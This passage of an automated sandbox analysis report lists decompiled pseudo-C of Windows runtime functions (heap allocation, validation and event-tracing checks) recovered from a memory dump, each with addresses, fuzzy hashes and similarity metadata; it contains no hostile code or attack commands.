				 *_t9 = _t14;
				return _t13;
			}

0x053cdb64
0x053cdb66
0x053cdb6b
0x053cdbaa
0x053cdb71
0x053cdb76
0x053cdb7a
0x053cdba3
0x053cdb7c
0x053cdb87
0x053cdb8b
0x05424fa1
0x05424fb3
0x05424fb8
0x053cdb91
0x053cdb96
0x053cdb98
0x053cdb98
0x053cdb8b
0x053cdb7a
0x053cdb9d
0x053cdba2

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction ID: 1e9e1aa30ff525ffc4a1250a15cb4c3b869bc3d9e330de5a31170b2cf24ad939
Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction Fuzzy Hash: C3F068332456B29BD7325A5548C4F67BEAA9FC1B60F1608BDF10A9B644CE608C0297D5

Uniqueness

Uniqueness Score: -1.00%

Function 053CB1E1, Relevance: .0, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E053CB1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E053E7D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E053E7D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E05447016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}

0x053cb1e8
0x053cb1ea
0x053cb1f3
0x05424a17
0x053cb1f9
0x053cb1f9
0x053cb1f9
0x053cb201
0x05424a21
0x05424a2e
0x00000000
0x00000000
0x05424a3b
0x05424a4d
0x05424a3d
0x05424a46
0x05424a46
0x05424a55
0x00000000
0x00000000
0x00000000
0x053cb20a
0x053cb20a
0x053cb20a
0x053cb20a

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction ID: 28bb17879833439a5129150f612fe93bd061270bf645267243f5098b32a9a054
Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction Fuzzy Hash: 4901D1323046A4DBDB229759D808FAABFDAFF51790F4800E6F9158BAB1DA79CC00C314

Uniqueness

Uniqueness Score: -1.00%

Function 0545FE87, Relevance: .0, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E0545FE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x54bd360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E053E7D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0540B640(E05409AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x0545fe96
0x0545fe9e
0x0545fea1
0x0545fead
0x0545feb3
0x0545feb9
0x0545fec3
0x0545fed5
0x0545fec5
0x0545fece
0x0545fece
0x0545fee0
0x0545fee1
0x0545fee3
0x0545fee8
0x0545fefb

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd0985c13bb583808ff5f27449e212cdc92e1f37368e2cff8f39a75ae10e130f
Instruction ID: 784f6b7890808d0cf59130d931a3e6c58ec87d65c2b497ce7058f2c367aff266
Opcode Fuzzy Hash: cd0985c13bb583808ff5f27449e212cdc92e1f37368e2cff8f39a75ae10e130f
Instruction Fuzzy Hash: 9C016270A0424CEFCB14DFA8D546AAEB7F4FF04300F1441AAB905DB382DA35D902CB41

Uniqueness

Uniqueness Score: -1.00%

Function 05498F6A, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E05498F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x54bd360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E053E7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E0540B640(E05409AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x05498f6a
0x05498f79
0x05498f81
0x05498f84
0x05498f8b
0x05498f91
0x05498f94
0x05498f9e
0x05498fb0
0x05498fa0
0x05498fa9
0x05498fa9
0x05498fbb
0x05498fbc
0x05498fbe
0x05498fc3
0x05498fd6

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ecb13fce467801e140c9cf66627bb27581bd0ed565edd5b32a47b60bb5e65ab9
Instruction ID: 035e6ae0a62debe0500125505ef13a120bdf0872ed0e336fab8f8166564119eb
Opcode Fuzzy Hash: ecb13fce467801e140c9cf66627bb27581bd0ed565edd5b32a47b60bb5e65ab9
Instruction Fuzzy Hash: 5F014474A0424CAFDB04DFA9D545AAEBBF4FF48300F10446AB905EB381DA74DA00CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0548131B, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E0548131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x54bd360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E053E7D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0540B640(E05409AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x0548131b
0x0548132a
0x05481330
0x05481336
0x0548133e
0x05481341
0x05481344
0x0548134f
0x05481361
0x05481351
0x0548135a
0x0548135a
0x0548136c
0x0548136d
0x0548136f
0x05481374
0x05481387

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0407181102c63fe827b985c927840e5d88c9a2eca9e41dd1f50a35a6ca414d6a
Instruction ID: 1f78a8196cb57515ef69416bc7614651b255268db1b11de27ce4bfcd0d4af78d
Opcode Fuzzy Hash: 0407181102c63fe827b985c927840e5d88c9a2eca9e41dd1f50a35a6ca414d6a
Instruction Fuzzy Hash: 23013C71E0525CAFDB04EFA9D549AAEB7F4FF08700F1040AAB945EB381EA74DA00CB54

Uniqueness

Uniqueness Score: -1.00%

Function 05481608, Relevance: .0, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E05481608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x54bd360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E053E7D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E0540B640(E05409AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}

0x05481608
0x05481617
0x0548161d
0x05481625
0x05481628
0x0548162b
0x05481636
0x05481648
0x05481638
0x05481641
0x05481641
0x05481653
0x05481654
0x05481656
0x0548165b
0x0548166e

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e38c79bcdf2987a8f345ccce0d500800c9ee00183d7256935110b62e15d300d5
Instruction ID: a53a3634a5f2c535a71806a408c11e8de66f3af45ab8c482302c88cb90c4a168
Opcode Fuzzy Hash: e38c79bcdf2987a8f345ccce0d500800c9ee00183d7256935110b62e15d300d5
Instruction Fuzzy Hash: 8CF06271E04258EFDB04EFA9D405AAFB7F4EF04300F0440AAB945EB381EA34D900CB54

Uniqueness

Uniqueness Score: -1.00%

Function 053EC577, Relevance: .0, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E053EC577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E053EC5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x53a11cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E054988F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}

0x053ec577
0x053ec57d
0x053ec581
0x053ec5b5
0x053ec5b9
0x053ec5ce
0x053ec5ce
0x053ec5ca
0x00000000
0x053ec5ca
0x053ec5c4
0x053ec5c8
0x00000000
0x00000000
0x00000000
0x053ec5ad
0x00000000
0x053ec5af

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9be43d11237f5be91bf9d6f1f1b95226087b917b358ec0a31e51813efed56d8
Instruction ID: 0e07627b307c96f8accb78edb361d090caf45fbc041f4c3582de98db7758289e
Opcode Fuzzy Hash: c9be43d11237f5be91bf9d6f1f1b95226087b917b358ec0a31e51813efed56d8
Instruction Fuzzy Hash: E9F0FAB2A192B88ED731C32A800CF2A7FE9AB05270F54A46BD40A836C1C2F0CC82C250

Uniqueness

Uniqueness Score: -1.00%

Function 05498D34, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E05498D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x54bd360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E053E7D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E0540B640(E05409AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}

0x05498d34
0x05498d43
0x05498d4b
0x05498d4e
0x05498d52
0x05498d5c
0x05498d6e
0x05498d5e
0x05498d67
0x05498d67
0x05498d79
0x05498d7a
0x05498d7c
0x05498d81
0x05498d94

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cae61d333bc182c25394c9a19689c19ed9589b24891d29e4f359af1f781f39d
Instruction ID: a8e46398ae9b536ee99813d4a69773e4f811499511613c1e53b3938adc013831
Opcode Fuzzy Hash: 3cae61d333bc182c25394c9a19689c19ed9589b24891d29e4f359af1f781f39d
Instruction Fuzzy Hash: 4BF0B470E0464C9FDB08EFB9D446BAE77B4EF44300F1080AAE905EB381DA34D900CB54

Uniqueness

Uniqueness Score: -1.00%

Function 05482073, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E05482073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E0547FD22(__ecx);
				_t19 =  *0x54b849c - _t3; // 0x682b5171
				if(_t19 == 0) {
					__eflags = _t17 -  *0x54b8748; // 0x0
					if(__eflags <= 0) {
						E05481C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x54b8724 & 0x00000004;
							if(( *0x54b8724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x54b8724; // 0x0
					return E05478DF1(__ebx, 0xc0000374, 0x54b5890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}

0x05482076
0x05482078
0x0548207d
0x05482083
0x054820a4
0x054820aa
0x054820ac
0x054820b7
0x054820ba
0x054820bc
0x054820c9
0x054820c9
0x054820d0
0x054820d2
0x00000000
0x054820d2
0x054820be
0x054820c3
0x054820c5
0x054820c7
0x00000000
0x00000000
0x054820c7
0x054820bc
0x054820d4
0x05482085
0x05482085
0x054820a3
0x054820a3

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7373ab9d6ebb98a450b7c34b421911c0b9058979391c8f113009650c71c2b4f
Instruction ID: 6667498716b7e2fef65dec300715852c02f8e26a9fd51c45da451a7b4aabf585
Opcode Fuzzy Hash: c7373ab9d6ebb98a450b7c34b421911c0b9058979391c8f113009650c71c2b4f
Instruction Fuzzy Hash: F1F0A73E5291844BFE36BF2575066FB7F95E747114B1914C7E55227301C9B48983CA20

Uniqueness

Uniqueness Score: -1.00%

Function 0540927A, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0540927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L053E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E0540FA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E054092C6(_t11, _t14);
				}
				return _t11;
			}

0x05409295
0x05409299
0x0540929f
0x054092aa
0x054092ad
0x054092ae
0x054092af
0x054092b0
0x054092b4
0x054092bb
0x054092bb
0x054092c5

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction ID: ea8d85f85837d7d3b8b5bb592653e4dae6e1870592bbe476df16e564461bb274
Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction Fuzzy Hash: 44E0ED723406006BEB219E1ACC88B8337A9AF82720F10407EB9001F282CAF6D80887A0

Uniqueness

Uniqueness Score: -1.00%

Function 053E746D, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E053E746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E053DEB70(__ecx, 0x54b79a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E054095D0();
							L053E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}

0x053e746d
0x053e746d
0x053e746d
0x053e7471
0x053e7488
0x0542f92d
0x053e748e
0x053e7491
0x053e7495
0x0542f937
0x0542f93a
0x0542f94e
0x0542f953
0x0542f956
0x0542f956
0x053e7495
0x00000000
0x053e7488
0x053e7473
0x053e7478
0x053e747d
0x053e7481
0x00000000
0x053e7481
0x053e747d
0x053e747a
0x00000000

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bfb34a90453047f12f3293762837d447d6bd2285198423047a6ca5ed0511fe0
Instruction ID: 8ff867485a330b29f7c086bd6bbaead2d66aec6590548654e9d615aa03e9cce8
Opcode Fuzzy Hash: 8bfb34a90453047f12f3293762837d447d6bd2285198423047a6ca5ed0511fe0
Instruction Fuzzy Hash: D0F0B4356041E4AADF11D768C440FF9BBF6FF04210F540156E451AB1E0E76598218F95

Uniqueness

Uniqueness Score: -1.00%

Function 05498CD6, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E05498CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x54bd360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E053E7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0540B640(E05409AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x05498ce5
0x05498ced
0x05498cf0
0x05498cfb
0x05498d0d
0x05498cfd
0x05498d06
0x05498d06
0x05498d18
0x05498d19
0x05498d1b
0x05498d20
0x05498d33

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0592b9e3ae5ed28a96c924636fb6ffeb25a4c9cc8e2031ec4034eaa09b88ce1
Instruction ID: e230fe2ee07c201d2ae370483420ec7f566adcc24d75718c9ad03d96c41f608d
Opcode Fuzzy Hash: b0592b9e3ae5ed28a96c924636fb6ffeb25a4c9cc8e2031ec4034eaa09b88ce1
Instruction Fuzzy Hash: 3BF08970A041589BDF04DBA9E946EAE77B4EF45200F1011AAF515EB3C1DA34D900C754

Uniqueness

Uniqueness Score: -1.00%

Function 053C4F2E, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E053C4F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E054988F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E053EC5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x53a1030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}

0x053c4f2e
0x053c4f34
0x053c4f38
0x05420b85
0x05420b85
0x05420b89
0x05420b9a
0x05420b9a
0x05420b9f
0x00000000
0x05420b9f
0x05420b94
0x05420b98
0x00000000
0x00000000
0x00000000
0x05420b98
0x053c4f3e
0x053c4f48
0x00000000
0x053c4f6e
0x00000000
0x053c4f70

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c77339029a898ddbdbc977f850b6c681dc7e763d77f7baa54250e8fa9f078f8
Instruction ID: ff0e8a8ecdf8d8129c361c90b4caeab0f16dd9d46411917d4572b94b10188cb4
Opcode Fuzzy Hash: 8c77339029a898ddbdbc977f850b6c681dc7e763d77f7baa54250e8fa9f078f8
Instruction Fuzzy Hash: 97F0BE365256B88FD770C798C14CFA3BFEABB01778F8454A6D40AC7A21C724EC40C690

Uniqueness

Uniqueness Score: -1.00%

Function 05498B58, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E05498B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x54bd360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E053E7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0540B640(E05409AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x05498b67
0x05498b6f
0x05498b72
0x05498b7d
0x05498b8f
0x05498b7f
0x05498b88
0x05498b88
0x05498b9a
0x05498b9b
0x05498b9d
0x05498ba2
0x05498bb5

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71eea9e5f51c778e1d50f2bb0efbb414a214b1bc26b01b890b79512e65a6b10b
Instruction ID: a7bc37af54d484f75eb2592ff31036c99a9dbc4022cffb226d7cfe8cc4fa8c61
Opcode Fuzzy Hash: 71eea9e5f51c778e1d50f2bb0efbb414a214b1bc26b01b890b79512e65a6b10b
Instruction Fuzzy Hash: 75F08970B1425C9BDF04EBA9D90AEAF77B4EF04300F1404A9BA05DB3C1EA74D901C754

Uniqueness

Uniqueness Score: -1.00%

Function 053FA44B, Relevance: .0, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E053FA44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x54b7b9c; // 0x0
				_t15 = __ecx;
				_t16 = L053E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E0540FA60(_t17, 0, _t15 << 2);
				return _t17;
			}

0x053fa44b
0x053fa453
0x053fa472
0x053fa476
0x00000000
0x053fa493
0x053fa47a
0x053fa47f
0x053fa486
0x00000000

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a172e43f630d1a9a5a5ac122548776914dba786e4be4effaf9631cfdb4a333d
Instruction ID: 8b65a13a6c5cb81a57bb6adea3d0d2a9a6ee29a2efab9d7f19ddb7d484e0db7b
Opcode Fuzzy Hash: 1a172e43f630d1a9a5a5ac122548776914dba786e4be4effaf9631cfdb4a333d
Instruction Fuzzy Hash: 98E09272B09421ABD2219A18AC04FA673ADEBE9651F194039F609C7250DA68DD11C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 053CF358, Relevance: .0, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E053CF358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E053FF3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L053E4620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}

0x053cf35d
0x053cf361
0x053cf367
0x053cf372
0x053cf38c
0x053cf38c
0x053cf394

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction ID: 5100f5c106413c77eb18e0fe9be21a56becdb43e0559aaf95c9f7f98389e5be7
Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction Fuzzy Hash: 4BE0D833A40118BBCB21A6D99D05F9ABFADDB48A60F000196BD04DB190D5649D00C3D0

Uniqueness

Uniqueness Score: -1.00%

Function 053DFF60, Relevance: .0, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E053DFF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x53a11a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E054988F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E053E0050(_t14);
				}
			}

0x053dff66
0x053dff6b
0x00000000
0x053dff8f
0x00000000
0x053dff8f

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 036dde785082a4a096526ae74e1db3307e9de1de8fd0b1ca17f89d01b518eb68
Instruction ID: c22007d67e2b0c8d298dccf27b851c6a89717bfdef0beedae41f9b6985f3be5a
Opcode Fuzzy Hash: 036dde785082a4a096526ae74e1db3307e9de1de8fd0b1ca17f89d01b518eb68
Instruction Fuzzy Hash: C4E0DFF22092849FDB38DB96E0C4F2DFBBDAB42629F19801EE00A4B501C661D880C276

Uniqueness

Uniqueness Score: -1.00%

Function 054541E8, Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E054541E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x54a08f0);
				_t5 = E0541D08C(__ebx, __edi, __esi);
				if( *0x54b87ec == 0) {
					E053DEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x54b87ec == 0) {
						 *0x54b87f0 = 0x54b87ec;
						 *0x54b87ec = 0x54b87ec;
						 *0x54b87e8 = 0x54b87e4;
						 *0x54b87e4 = 0x54b87e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L05454248();
				}
				return E0541D0D1(_t5);
			}

0x054541e8
0x054541ea
0x054541ef
0x054541fb
0x05454206
0x0545420b
